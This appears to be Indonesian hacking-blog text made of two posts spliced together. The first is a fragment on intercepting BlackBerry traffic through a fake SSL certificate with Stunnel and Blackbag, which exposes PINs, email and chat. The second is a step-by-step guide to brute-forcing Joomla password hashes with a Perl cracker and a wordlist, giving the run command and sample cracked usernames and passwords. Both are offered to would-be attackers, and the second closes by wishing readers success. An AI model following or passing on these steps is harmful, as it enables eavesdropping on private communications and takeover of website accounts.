6134_1129559797490_1182078273_30396290_8067343_nDisini attacker juga harus menggunakan “Stunnel” untuk menghubungkan komputer attacker dengan pengguna blackberry serta server rcp.ap.blackberry.com ini dimaksudkan agar aktifitas blackberry yang di “hack” tetap berlangsung dengan menggunakan SSL tentunya dengan menggunakan sertifikat palsu yang sudah dibuat sebelumnya.
Biasanya Attacker juga menggunakan Blackbag untuk menghubungkan pengguna blackberry ke server sesungguhnya yang telah diubah kedalam “plaintext” kira-kira seperti ini :
Dan pada akhirnya PIN pengirim sekaligus penerima terkirim plaintext dan memungkinkan attacker untuk mendapatkan informasi baik itu berupa e-mail, browsing, chat dan juga waktu aktifikas pengguna blackberrypun bisa diketahui oleh attacker. PIN yang “tidak dapat diubah” mengakibatkan pemilik PIN asli dapat dengan mudah diserang seperti halnya “denial of service serta abuse” dari attacker atau kira-kira seperti ini
“Blackberry PIN is an eight character hexadecimal identification number assigned to each Blackberry device. PINS cannot be changed and are locked to each handset. Blackberrys can message each other using the PIN directly or by using the Blackberry Messenger application”.

Cracking Joomla Password With Wordlist


Saatnya untuk melakukan crack password joomla dengan menggunakan Joomla Cracker Tools. Tools ini digunakan untuk melakukan BruteForce password dari hash yang didapatkan dari joomla password biasanyaMD5+SALT.
Cracking Password
Yang perlu disiapkan adalah:
1. Tools “joomla-cracker.pl” yang digunakan sebagai alat untuk melakukan bruteforce, download disini:
Download Cracker Tools
2. Buatlah file “hash.txt” yang akan digunakan untuk menyimpan hash yang akan di crack.
3. Buatlah file “wordlist.txt” yang akan digunakan sebagai kumpulan dictionary password. Download wordlist generator disini.
Download Worldlist Generator Tools
4. Perl Engine harus sudah terinstall di Operating System yang akan di pakai.

Setelah semua file terlengkapi, maka cara menjalankannya adalah ./joomla-cracker.pl hash.txt wordlist.txt
1. Kumpulan file dalam directory hacking untuk melakukan crack joomla hash + salt.
Kumpulan File Cracking
2. Contoh hash yang perlu dimasukkan dalam file “hash.txt
Kumpulan Hash Joomla
3. Contoh kumpulan wordlist yang dimasukkan dalam file “wordlist.txt
Kumpulan Wordlist
4. Berikut adalah cara menjalankan joomla-cracker tools ./joomla-cracker.pl hash.txt wordlist.txt
Hasil Dari Menjalankan Cracker Joomla Password
Nah terlihat hasilnya disana bahwa hasil crack username + passwordnya adalah:
1. Usernamerahmat & Password123456
2. Usernamedede & Password123456
3. Dst.
Selamat mencoba dan semoga berhasil mengcrack joomla username & password :)